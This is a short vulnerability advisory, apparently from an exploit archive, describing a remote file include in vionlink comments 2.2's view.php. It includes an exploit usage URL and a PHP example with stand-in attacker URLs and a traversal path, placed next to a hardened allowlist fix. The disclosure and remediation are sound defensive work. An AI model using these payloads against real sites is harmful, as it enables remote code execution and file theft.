# Exploit-Title: vionlink comments 2.2 Remote File Include Vulnerability
# Date: 2014-05-06
# Author: bd0rk
# Software-Link: http://www.vionlink.de/downloadcounter.php?version=v_comments2.2
# Affected-Version: 2.2
# G00gle-D0rK: n/a --->script-kiddieprotected
# Tested on: Ubuntu-Linux 14.04 LTS
# Contact: twitter.com/bd0rk
Sh0rT-Description:
I found vulnerable php-sourcecode in directory /vionlink.comments/view.php
--------------------------------------------------------------------------
In lines 29-30: if(is_array($data)){extract($data);}
@include $filename; echo cright;
--------------------------------------------------------------------------
extract($data) turns every key of the request array into a local variable, so the
$filename that is passed to include on the next line is attacker-controlled. With
allow_url_include enabled this is a remote file include: the attacker supplies a URL
and the script fetches and executes the PHP code behind it. If allow_url_include is
off (the PHP default since 5.2), the same line still includes any local file the
web server process can read.
Access-Possibilities: Compromise of the system, for example.
[+]Usage: http://[host]/vionlink.comments/view.php?filename=[EVILCODE]
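The pattern above next to a hardened version, as an added example (not vionlink comments' own code). It assumes $data is the request array (such as $_GET) that the original script hands to extract(); the template names in ALLOWED_VIEWS and the "view" parameter are hypothetical.

```php
<?php
// Added example, not code from vionlink comments. Assumption: $data is the
// request array (e.g. $_GET) that view.php passes to extract().

// --- Vulnerable pattern (what lines 29-30 of view.php do) ---
function render_vulnerable(array $data): void
{
    // extract() turns every request key into a local variable, so a request
    // like ?filename=http://attacker.example/shell.txt sets $filename here.
    if (is_array($data)) {
        extract($data);
    }
    // $filename is attacker-controlled: with allow_url_include=On this
    // downloads and executes remote PHP; otherwise it still includes any
    // readable local file (local file include).
    @include $filename;
}

// --- Hardened version: no extract(), and the include target comes from a
// fixed server-side allowlist instead of from the request. ---
const ALLOWED_VIEWS = [               // hypothetical template map
    'list'   => 'templates/list.php',
    'single' => 'templates/single.php',
];

// Returns the absolute path to include, or null if the request asks for
// anything outside the allowlist.
function resolve_view(array $data): ?string
{
    $key = $data['view'] ?? 'list';   // the request only supplies a key
    if (!is_string($key) || !array_key_exists($key, ALLOWED_VIEWS)) {
        return null;                  // unknown key: refuse, never build a path from it
    }
    return __DIR__ . '/' . ALLOWED_VIEWS[$key];
}

function render_hardened(array $data): void
{
    $path = resolve_view($data);
    if ($path === null) {
        http_response_code(400);
        echo 'unknown view';
        return;
    }
    include $path;                    // path assembled server-side only
}

// Exercise the resolver on constructed requests (no template files needed):
var_dump(resolve_view(['view' => 'single']));
var_dump(resolve_view(['view' => '../../../../etc/passwd']));
var_dump(resolve_view(['filename' => 'http://attacker.example/shell.txt']));
```

The first call resolves to the allowed single.php template, the traversal attempt is rejected with null, and a request that sets filename (the original attack parameter) is simply ignored because the hardened code never reads it: the user chooses a key, the server chooses the file.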
### The 25 years old german Hacker bd0rk ###
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information